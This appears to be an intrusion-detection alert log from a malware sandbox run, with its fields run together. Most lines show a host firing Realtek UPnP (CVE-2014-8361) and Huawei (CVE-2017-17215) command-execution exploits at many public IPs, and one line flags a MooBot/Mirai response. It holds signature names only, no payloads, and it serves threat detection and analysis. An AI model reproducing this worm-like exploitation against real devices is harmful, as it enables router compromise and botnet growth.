                                      07/20/24-23:01:45.500918TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3979452869192.168.2.23104.226.237.113
                                      07/20/24-23:01:52.940746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5354852869192.168.2.23221.3.151.48
                                      07/20/24-23:01:11.631549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721437215192.168.2.23167.255.64.127
                                      07/20/24-23:01:57.476832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6058052869192.168.2.23138.82.75.1
                                      07/20/24-23:01:24.934977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096637215192.168.2.23197.31.197.218
                                      07/20/24-23:01:04.769670TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3854052869192.168.2.23135.110.213.163
                                      07/20/24-23:01:14.169782TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response24663284815.235.203.214192.168.2.23
                                      07/20/24-23:01:12.807274TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25510852869192.168.2.23190.111.169.67
                                      07/20/24-23:01:40.285038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000237215192.168.2.2340.163.171.209
                                      07/20/24-23:01:42.603963TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3351452869192.168.2.23168.75.18.77
                                      07/20/24-23:02:05.745200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5249252869192.168.2.23104.143.173.10
                                      07/20/24-23:01:08.621030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24004252869192.168.2.23137.195.128.162
                                      07/20/24-23:01:41.217142TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615928852869192.168.2.23221.195.248.226
                                      07/20/24-23:01:08.629616TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24066052869192.168.2.23135.110.213.163
                                      07/20/24-23:01:31.983105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518637215192.168.2.2341.118.52.116
                                      07/20/24-23:01:10.610618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3970052869192.168.2.23213.27.181.202
                                      07/20/24-23:01:43.845332TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615055852869192.168.2.23109.104.48.215
                                      07/20/24-23:01:49.660516TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613470852869192.168.2.23203.130.71.37
                                      07/20/24-23:01:04.031510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847237215192.168.2.23157.194.46.134
                                      07/20/24-23:02:11.592030TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615647252869192.168.2.23139.220.216.2
                                      07/20/24-23:01:53.775275TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615848452869192.168.2.23155.246.197.66
                                      07/20/24-23:01:08.585790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25400652869192.168.2.2363.150.57.125
                                      07/20/24-23:01:11.630833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658637215192.168.2.23197.224.131.168
                                      07/20/24-23:01:13.287248TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5822052869192.168.2.235.142.247.218
                                      07/20/24-23:01:08.567236TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5737052869192.168.2.23151.5.114.8
                                      07/20/24-23:01:31.991548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479837215192.168.2.2341.24.2.217
                                      07/20/24-23:01:21.952783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5526237215192.168.2.23197.13.253.64
                                      07/20/24-23:01:41.399866TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3410852869192.168.2.2392.1.18.107
                                      07/20/24-23:01:44.019540TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614475052869192.168.2.23179.32.230.224
                                      07/20/24-23:02:48.447182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6045652869192.168.2.2320.185.209.150
                                      07/20/24-23:01:34.043766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004037215192.168.2.2341.243.122.81
                                      07/20/24-23:00:59.163619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894637215192.168.2.2367.15.208.48
                                      07/20/24-23:01:01.632331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5159052869192.168.2.2363.150.57.125
                                      07/20/24-23:01:27.660099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231637215192.168.2.23209.25.89.22
                                      07/20/24-23:02:04.640460TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4020452869192.168.2.2339.135.72.98
                                      07/20/24-23:02:01.761996TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615740852869192.168.2.23105.47.109.140
                                      07/20/24-23:01:46.893328TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4590452869192.168.2.2347.141.1.52
                                      07/20/24-23:01:54.405308TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4741452869192.168.2.23176.129.124.225
                                      07/20/24-23:01:00.640312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835637215192.168.2.2341.156.85.195
                                      07/20/24-23:01:27.766239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861637215192.168.2.23197.72.179.4
                                      07/20/24-23:01:43.555540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5237852869192.168.2.23153.197.27.100
                                      07/20/24-23:01:46.955966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3581452869192.168.2.2397.254.137.62
                                      07/20/24-23:00:57.221803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060237215192.168.2.23157.15.115.232
                                      07/20/24-23:00:57.222279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411037215192.168.2.2341.81.198.30
                                      07/20/24-23:01:04.760964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961052869192.168.2.23119.8.134.128
                                      07/20/24-23:01:20.596563TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23363452869192.168.2.2352.164.165.154
                                      07/20/24-23:01:02.144931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5169652869192.168.2.23143.254.34.7
                                      07/20/24-23:01:48.160375TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3896452869192.168.2.23182.62.146.57
                                      07/20/24-23:01:06.994337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045037215192.168.2.23157.242.29.232
                                      07/20/24-23:01:48.885298TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614989452869192.168.2.23136.148.234.160
                                      07/20/24-23:01:52.766296TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24498052869192.168.2.23134.168.191.164
                                      07/20/24-23:01:43.855231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4229652869192.168.2.23203.94.134.229
                                      07/20/24-23:01:06.996055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282637215192.168.2.2341.52.198.36
                                      07/20/24-23:00:59.168569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382837215192.168.2.23195.225.222.112
                                      07/20/24-23:01:41.182584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615245452869192.168.2.23155.251.124.204
                                      07/20/24-23:01:42.527235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5809652869192.168.2.2370.95.192.176
                                      07/20/24-23:01:20.144672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070437215192.168.2.23157.149.181.67
                                      07/20/24-23:01:24.885849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395237215192.168.2.2341.118.38.95
                                      07/20/24-23:01:49.329747TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23404052869192.168.2.2344.152.141.175
                                      07/20/24-23:01:00.639012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512037215192.168.2.23197.173.93.85
                                      07/20/24-23:01:51.076036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5462452869192.168.2.23203.124.141.209
                                      07/20/24-23:01:34.062277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801437215192.168.2.23195.17.33.203
                                      07/20/24-23:01:27.649731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4950837215192.168.2.23157.39.79.111
                                      07/20/24-23:01:59.449569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4885052869192.168.2.2357.22.35.81
                                      07/20/24-23:01:25.848287TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614227652869192.168.2.2319.16.79.3
                                      07/20/24-23:01:25.342792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615865852869192.168.2.23154.90.91.204
                                      07/20/24-23:01:51.968363TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613725652869192.168.2.23140.201.238.135
                                      07/20/24-23:02:04.640459TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3295852869192.168.2.23205.96.176.194
                                      07/20/24-23:01:00.633984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662637215192.168.2.23217.159.91.139
                                      07/20/24-23:01:42.944341TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615542652869192.168.2.23201.86.102.204
                                      07/20/24-23:01:12.805765TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23528252869192.168.2.23131.120.226.33
                                      07/20/24-23:01:24.898476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025237215192.168.2.23100.7.152.54
                                      07/20/24-23:01:55.262010TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4079852869192.168.2.23178.199.253.233
                                      07/20/24-23:01:00.640312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711037215192.168.2.2341.126.189.157
                                      07/20/24-23:01:14.100332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087837215192.168.2.2374.49.109.135
                                      07/20/24-23:01:46.323644TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615388252869192.168.2.2335.100.148.20
                                      07/20/24-23:01:53.675171TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615309652869192.168.2.23196.92.88.25
                                      07/20/24-23:01:54.727406TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24925052869192.168.2.23174.110.120.103
                                      07/20/24-23:01:31.976649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018037215192.168.2.23157.190.18.125
                                      07/20/24-23:01:42.688831TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3584452869192.168.2.23125.246.56.225
                                      07/20/24-23:01:51.014531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4323452869192.168.2.23120.123.66.167
                                      07/20/24-23:01:14.100332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620637215192.168.2.23199.196.42.92
                                      07/20/24-23:01:58.353725TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613406452869192.168.2.2339.235.222.86
                                      07/20/24-23:01:42.452119TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4100852869192.168.2.23130.186.238.85
                                      07/20/24-23:01:08.613164TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5793452869192.168.2.23191.173.38.241
                                      07/20/24-23:01:44.405053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4960852869192.168.2.2318.181.232.193
                                      07/20/24-23:01:20.132511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380037215192.168.2.23157.242.54.73
                                      07/20/24-23:01:27.653586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197637215192.168.2.23197.98.241.246
                                      07/20/24-23:01:21.951975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341037215192.168.2.23203.123.59.88
                                      07/20/24-23:01:34.045749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385637215192.168.2.2378.116.5.24
                                      07/20/24-23:01:21.915268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092437215192.168.2.23197.95.96.216
                                      07/20/24-23:01:00.654988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554637215192.168.2.23157.12.106.29
                                      07/20/24-23:00:57.220905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4028237215192.168.2.2323.141.91.228
                                      07/20/24-23:01:07.066373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772437215192.168.2.2341.154.180.14
                                      07/20/24-23:01:41.323363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5765252869192.168.2.2353.13.47.10
                                      07/20/24-23:01:41.488676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3663852869192.168.2.2389.174.70.107
                                      07/20/24-23:01:06.988055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5107437215192.168.2.23197.247.144.22
                                      07/20/24-23:01:31.976984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700237215192.168.2.2341.222.246.61
                                      07/20/24-23:01:49.231608TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4595452869192.168.2.2342.66.196.35
                                      07/20/24-23:01:01.415907TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5727052869192.168.2.2341.215.81.142
                                      07/20/24-23:01:31.329969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23947852869192.168.2.2314.200.138.62
                                      07/20/24-23:01:43.135090TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613901052869192.168.2.23150.76.139.116
                                      07/20/24-23:01:45.202570TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25354652869192.168.2.2388.161.89.160
                                      07/20/24-23:01:52.877228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5686252869192.168.2.23185.104.180.12
                                      07/20/24-23:01:04.114673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5338237215192.168.2.2341.113.152.211
                                      07/20/24-23:01:46.143923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4300452869192.168.2.23118.134.216.118
                                      07/20/24-23:01:04.082385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3770237215192.168.2.23178.197.69.23
                                      07/20/24-23:01:42.454682TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613662852869192.168.2.2357.234.190.125
                                      07/20/24-23:01:46.783122TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23872852869192.168.2.23157.175.172.46
                                      07/20/24-23:01:31.320679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4793652869192.168.2.23158.118.231.218
                                      07/20/24-23:01:44.565131TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23970852869192.168.2.23189.66.149.229
                                      07/20/24-23:01:31.314906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25210252869192.168.2.2390.135.90.32
                                      07/20/24-23:01:31.312894TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25334452869192.168.2.2334.158.218.166
                                      07/20/24-23:01:54.693625TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26083052869192.168.2.23118.111.39.192
                                      07/20/24-23:01:25.544921TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614602452869192.168.2.23123.145.45.176
                                      07/20/24-23:01:42.662466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3420652869192.168.2.23130.184.173.22
                                      07/20/24-23:01:49.809920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6081852869192.168.2.23104.158.63.237
                                      07/20/24-23:01:34.046616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313437215192.168.2.23109.114.93.203
                                      07/20/24-23:01:02.132906TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614195452869192.168.2.23108.144.159.228
                                      07/20/24-23:01:53.175676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614231252869192.168.2.23125.58.232.126
                                      07/20/24-23:01:41.549052TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5895052869192.168.2.2352.97.71.90
                                      07/20/24-23:01:20.157619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187837215192.168.2.23197.24.162.140
                                      07/20/24-23:02:08.826483TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613829852869192.168.2.2359.115.71.173
                                      07/20/24-23:01:42.290838TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3751052869192.168.2.2349.182.174.70
                                      07/20/24-23:01:41.339597TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4877052869192.168.2.2340.200.215.102
                                      07/20/24-23:01:41.156801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387052869192.168.2.23165.210.119.115
                                      07/20/24-23:01:57.269160TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613470252869192.168.2.23185.209.39.214
                                      07/20/24-23:01:31.975158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882237215192.168.2.23181.88.221.210
                                      07/20/24-23:01:24.885895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755037215192.168.2.2380.165.144.55
                                      07/20/24-23:02:11.630112TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615067452869192.168.2.23142.204.114.80
                                      07/20/24-23:01:40.334452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554237215192.168.2.23157.188.48.47
                                      07/20/24-23:01:42.664090TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25838652869192.168.2.23113.55.199.122
                                      07/20/24-23:01:58.313085TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615185852869192.168.2.23199.118.63.112
                                      07/20/24-23:02:18.238800TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613534852869192.168.2.23140.189.156.39
                                      07/20/24-23:01:40.336908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233037215192.168.2.2341.250.13.148
                                      07/20/24-23:01:08.634900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25507252869192.168.2.23123.42.160.177
                                      07/20/24-23:01:14.097795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641837215192.168.2.2344.253.8.229
                                      07/20/24-23:01:46.439689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24883452869192.168.2.23129.145.211.206
                                      07/20/24-23:01:54.914948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25460652869192.168.2.23171.236.184.127
                                      07/20/24-23:01:21.923917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628637215192.168.2.2319.252.46.199
                                      07/20/24-23:01:48.065745TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4851252869192.168.2.2387.107.52.197
                                      07/20/24-23:01:21.923917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469837215192.168.2.23157.151.71.150
                                      07/20/24-23:01:27.654172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4897037215192.168.2.2341.27.67.46
                                      07/20/24-23:01:31.991336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840037215192.168.2.23197.117.206.14
                                      07/20/24-23:01:10.675827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4085452869192.168.2.23217.106.167.57
                                      07/20/24-23:01:47.808098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3412052869192.168.2.2357.119.169.7
                                      07/20/24-23:01:40.301143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504037215192.168.2.23111.130.70.21
                                      07/20/24-23:01:41.542563TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6033852869192.168.2.23162.207.42.25
                                      07/20/24-23:01:27.730585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489637215192.168.2.2341.64.148.15
                                      07/20/24-23:01:14.103467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282437215192.168.2.2341.191.214.143
                                      07/20/24-23:01:41.496780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4922452869192.168.2.2359.110.210.1
                                      07/20/24-23:01:00.634089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868037215192.168.2.231.70.219.104
                                      07/20/24-23:01:46.520663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5041852869192.168.2.23172.247.8.242
                                      07/20/24-23:01:47.663629TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615212852869192.168.2.2361.27.196.68
                                      07/20/24-23:01:41.182584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614118652869192.168.2.23150.183.54.123
                                      07/20/24-23:01:45.683188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3738052869192.168.2.23198.213.74.132
                                      07/20/24-23:01:47.891992TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615678252869192.168.2.2398.158.142.52
                                      07/20/24-23:01:52.019773TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614773452869192.168.2.23189.86.15.141
                                      07/20/24-23:01:08.606848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4719452869192.168.2.2360.99.150.220
                                      07/20/24-23:01:14.097135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017837215192.168.2.23105.62.150.147
                                      07/20/24-23:01:49.207937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614081452869192.168.2.23197.4.127.82
                                      07/20/24-23:01:00.634089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821637215192.168.2.23197.235.150.198
                                      07/20/24-23:02:05.036436TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4957252869192.168.2.2357.22.35.81
                                      07/20/24-23:01:02.079114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4380637215192.168.2.2341.252.46.65
                                      07/20/24-23:01:41.236294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4182252869192.168.2.2335.204.82.212
                                      07/20/24-23:01:52.089079TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5965252869192.168.2.2335.179.67.131
                                      07/20/24-23:01:02.076704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4440452869192.168.2.234.131.130.12
                                      07/20/24-23:01:31.312311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4901052869192.168.2.23162.229.91.161
                                      07/20/24-23:01:21.928521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676237215192.168.2.23197.23.40.145
                                      07/20/24-23:01:41.474540TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614473252869192.168.2.23208.75.90.116
                                      07/20/24-23:01:41.383466TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613513052869192.168.2.23193.15.215.48
                                      07/20/24-23:01:57.049485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3952252869192.168.2.23135.128.96.121
                                      07/20/24-23:02:02.537098TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615469052869192.168.2.23113.102.84.222
                                      07/20/24-23:01:42.727671TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614142852869192.168.2.23169.97.165.219
                                      07/20/24-23:01:14.207040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331237215192.168.2.23161.238.126.206
                                      07/20/24-23:01:11.636599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763637215192.168.2.23197.48.126.38
                                      07/20/24-23:01:45.148866TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24128252869192.168.2.23208.111.2.186
                                      07/20/24-23:01:12.807101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3733252869192.168.2.23207.199.110.98
